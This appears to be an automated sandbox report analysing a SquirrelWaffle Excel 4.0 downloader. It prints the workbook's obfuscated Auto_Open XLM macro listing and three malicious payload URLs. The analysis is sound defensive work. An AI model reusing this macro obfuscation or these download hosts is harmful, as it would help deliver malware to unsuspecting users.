MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059.001 PowerShell
T1059.003 Windows Command Shell
The sample is an Excel 4.0 spreadsheet containing an Auto_Open macro, which is a critical indicator of malicious intent. The macro utilizes ShellExecute and dangerous formula APIs, consistent with downloading and executing a second-stage payload. ClamAV detection confirms this, identifying it as Xls.Downloader.SquirrelWaffle. The embedded URLs are likely sources for this payload.
Heuristics 7
-
ClamAV: Xls.Downloader.SquirrelWaffle20921-9895790-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.SquirrelWaffle20921-9895790-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
URL reconstructed from XLM cell array (3 URLs) critical OLE_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://cortinastelasytrazos.com/Yro6Atvj/sec.html Referenced by macro
- https://orquideavallenata.com/4jmDb0s9sg/sec.htmlReferenced by macro
- https://fundacionverdaderosheroes.com/gY0Op5Jkht/sec.htmlReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 9167 bytes |
SHA-256: 125eeb65449215b38b4c93bcf67effc9a2990373b692ed6d0729f78b6e651f74 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 10 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - N
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - su
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ep
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - frm
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - frm.
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - frm..
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - fev
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - fte
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - ch
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - ci
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d frm.!E1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' su,D1,CHAR(200-86),""
' su,G2,CHAR(109-61),""
' su,K2,CHAR(190-91),""
' su,O2,CHAR(150-68),""
' su,C3,CHAR(200-99),""
' su,M3,CHAR(184-99),""
' su,H4,CHAR(200-133),""
' su,N4,CHAR(179-103),""
' su,B5,CHAR(200-125),""
' su,E5,CHAR(101-50),""
' su,J5,CHAR(250-134),""
' su,P5,CHAR(230-130),""
' su,F7,CHAR(100-50),""
' su,I7,CHAR(210-113),""
' su,L7,CHAR(220-109),""
' su,Q7,CHAR(157-88),""
' su,N8,CHAR(180-61),""
' su,A9,CHAR(201-91),""
' su,C9,CHAR(210-102),""
' su,H10,CHAR(140-72),""
' su,J10,CHAR(230-109),""
' su,P10,CHAR(186-102),""
' su,D11,CHAR(140-91),""
' su,L11,CHAR(192-100),""
' su,E12,CHAR(190-75),""
' su,I12,CHAR(220-115),""
' su,Q12,CHAR(190-70),""
' su,S12,CHAR(207-104),""
' su,B13,CHAR(101-36),""
' su,O13,CHAR(160-90),""
' su,K14,CHAR(145-99),""
' su,D15,CHAR(145-71),""
' su,G15,CHAR(210-93),""
' su,P15,CHAR(190-86),""
' su,T15,CHAR(197-85),""
' su,L16,CHAR(150-84),""
' su,E17,CHAR(230-172),""
' su,I17,CHAR(205-96),""
' su,Q17,CHAR(240-122),""
' su,N18,CHAR(150-67),""
' su,B19,CHAR(220-108),""
' su,J21,CHAR(108-55),""
' su,H32,_xlfn.ARABIC("CXI"),""
' su,D35,_xlfn.ARABIC("CI"),""
' su,K43,_xlfn.ARABIC("LXVII"),""
' ep,I2,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' ep,Q4,"CONCATENATE( Shee!S24, Shee!L7, Shee!T15, Shee!C3, Shee!A9, Shee!S24, Shee!S25)",""
' ep,D5,"CONCATENATE( Shee!S24, Shee!H4, Shee!D1, Shee!C3, Shee!I7, Shee!J5, Shee!C3,, Shee!H10, Shee!I12, Shee!D1, Shee!C3, Shee!K2, Shee!J5, Shee!L7, Shee!D1, Shee!J10, Shee!B13, Shee!S24, Shee!S25)",""
' ep,L7,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!Q7, Shee!Q12, Shee!C3, Shee!K2, Shee!G15, Shee!J5, Shee!C3, Shee!B13, Shee!S24, Shee!S25)",""
' ep,S7,"CONCATENATE( Shee!S24, Shee!D1, Shee!C3, Shee!S12, Shee!E12, Shee!Q17, Shee!D1, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' ep,H9,"CONCATENATE( Shee!S24, Shee!M3, Shee!O2,)",""
' ep,F10,"CONCATENATE( Shee!S24, Shee!D15, Shee!H4, Shee!D15, Shee!S24, Shee!S25)",""
' ep,O11,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!H4, Shee!D15, Shee!D15, Shee!S24, Shee!S25)",""
' ep,B13,"CONCATENATE( Shee!S24, Shee!B5, Shee!C3, Shee!D1, Shee!A9, Shee!C3, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' ep,H14,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!L16, Shee!L16, Shee!S24, Shee!S25)",""
' ep,F15,"CONCATENATE( Shee!S24, Shee!G15, Shee!D1, Shee!C9, Shee!I17, Shee!L7, Shee!A9, Shee!S24, Shee!S25)",""
' ep,D17,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!S24, Shee!S25)",""
' ep,B21,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!D11, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' ep,G24,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' ep,E28,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!F7, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' ep,I10,"CONCATENATE( Shee!N4, Shee!H10,)",""
' ep,I11,"CONCATENATE( Shee!L7, Shee!N8,)",""
' ep,H12,"CONCATENATE( Shee!A9, Shee!C9,)",""
' ep,J8,"CONCATENATE( Shee!L7, Shee!I7,)",""
' ep,I11,"CONCATENATE( Shee!P5, Shee!P10,)",""
' ep,N8,"CONCATENATE(, Shee!O13, Shee!I12, Shee!C9, Shee!S46)",""
' ep,I12,"CONCATENATE( Shee!B13, Shee!S24, Shee!S25)",""
' ep,F9,"CONCATENATE( Shee!G2, Shee!S25)",""
' frm,E8,"FORMULA( N!B13, su!H21)=FORMULA( N!D5, su!H22)=FORMULA( ep!D4, ep!E22)=FORMULA( N!F10, su!H23)=FORMULA( frm!G14, ep!I9)=FORMULA( N!D17, su!H24)=FORMULA( N!H9& ep!I10& ep!I11& ep!H12& ep!J8& ep!I11& ep!I9& ep!N8& ep!E22& fev!I12, su!H27)=FORMULA( Shee!G2, su!H25)=FORMULA( N!F15, su!H26)=FORMULA( frm..!F9, su!H29)=FORMULA( N!H14, su!H28)=FORMULA( N!G24, su!H31)=FORMULA( N!I2, su!H34)=FORMULA( N!L7, su!H35)=FORMULA( fte!G12, ch!C18)=FORMULA( N!O11, su!H36)=FORMULA( N!Q4, su!H38)=FORMULA( N!B21, su!H58)=FORMULA( N!S7, su!H39)=FORMULA( N!G24, su!H40)=FORMULA( N!E28, su!H60)=FORMULA( Shee!J21, su!H42)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H21& su!H22& su!H23& su!H24& su!H25& Shee!P37, frm.!E15)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H40& su!H29& su!H42& Shee!P37, frm.!E19)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I18& su!H31& su!H29& su!H25& Shee!P37, frm.!E17)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I19& su!H58& su!H29& su!H25& Shee!P37, frm.!E21)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H58& su!H29& su!H42& Shee!P37, frm.!E23)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H26& su!H27& su!H28& su!H29& N!I20& su!H60& su!H29& su!H25& Shee!P37, frm.!E25)=FORMULA( Shee!P31& ch!C18& Shee!P34& Shee!P35& Shee!P35& Shee!P36& su!H34& su!H35& su!H36& su!H29& su!H38& su!H39& su!H60& su!H29& su!H42& Shee!P37, frm.!E27)",""
' frm..,D11,"FORMULA(CHAR(200-99), ep!I9)",""
' fev,G14,CHAR( Shee!H32),""
' fte,D4,CHAR( Shee!D35),""
' ci,G12,CHAR( Shee!K43),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.